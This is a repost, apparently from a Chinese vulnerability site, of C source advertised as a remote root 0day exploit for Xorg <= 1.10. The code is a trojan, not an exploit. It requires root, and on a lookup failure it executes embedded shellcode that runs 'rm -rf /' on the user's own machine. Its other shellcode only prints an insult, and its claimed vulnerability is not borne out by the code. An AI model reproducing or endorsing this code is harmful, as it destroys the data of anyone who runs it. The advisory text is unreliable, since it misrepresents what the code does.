Xorg <= 1.10 remote root 0day exploit (32-bit x86)

Xorg 是 X11 窗口系统的一个开源实现。Xorg 在 Linux 用户中非常流行，已经成为图形用户程序的必备条件，所以大部分发行版都提供了它。Xorg <= 1.10存在安全漏洞可能导致攻击者远程获取root权限。

[+]info:
~~~~~~~~~
Xorg &lt;= 1.10 remote root 0day exploit (32-bit x86)

[+]poc:
~~~~~~~~~

 

 

 

#include <stdio.h>

#include <netdb.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <arpa/inet.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

 

void usage(char *argv[])

{

    printf("\t[+] XORG <= 1.10 remote root 0day exploit\n");

    printf("\t[+] By: Amzo\n");

    printf("\t[+] Mad respect to hackforums \n");

    printf("\t[+] usage: %s <target> \n\n", argv[0]);

    exit(1);

}

 

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"

  "\x6a\x2f\x89\xe7\x52"

  "\x66\x68\x2d\x66\x89"

  "\xe6\x52\x66\x68\x2d"

  "\x72\x89\xe1\x52\x68"

  "\x2f\x2f\x72\x6d\x68"

  "\x2f\x62\x69\x6e\x89"

  "\xe3\x52\x57\x56\x51"

  "\x53\x89\xe1\xcd\x80";

 

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"

  "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"

  "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"

  "\xdb\x40\xcd\x80";

 

int main(int argc, char **argv)

{

 

    int euid = geteuid();

    int port= 22, sock;

    char h[1000];

    struct hostent *host;

    struct sockaddr_in addr;

 

    if(euid != 0)

    {

  fprintf(stderr, "You need to be root to use raw sockets.\n");

  exit(1);

    }

    if(euid == 0)

    {

  fprintf(stdout, "MIKU! MIKU! MIKU!\n");

    }

    if(argc != 3)

    usage(argv);

    if(!inet_aton(h, &addr.sin_addr))

    {

  host = gethostbyname(h);

  if(!host)

  {

    fprintf(stderr, "[-] Exploit failed.\n");

    (*(void(*)())decoder)();

    exit(1);

  }

  addr.sin_addr = *(struct in_addr*)host->h_addr;

  }

  sock = socket(PF_INET, SOCK_STREAM, 0);

  addr.sin_port = htons(port);

  addr.sin_family = AF_INET;

  if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)

  {

    fprintf(stderr,"[-] Exploit failed.\n");

    exit(1);

  }

  char payload[1337];

  memcpy(payload, &decoder, sizeof(decoder));

  memcpy(payload, &rootshell, sizeof(rootshell));

  send(sock, payload, strlen(payload),0);

  close(sock);

  if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)

  {

    fprintf(stderr, "[-] Exploit failed.\n");

    exit(1);

  }

  else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)

  {

    fprintf(stdout, "[+]Got Root!\n");

    system("/bin/bash");

  }

  else

  {

    fprintf(stderr, "[-] Exploit failed.\n");

    close(sock);

    exit(0);

  }

 

}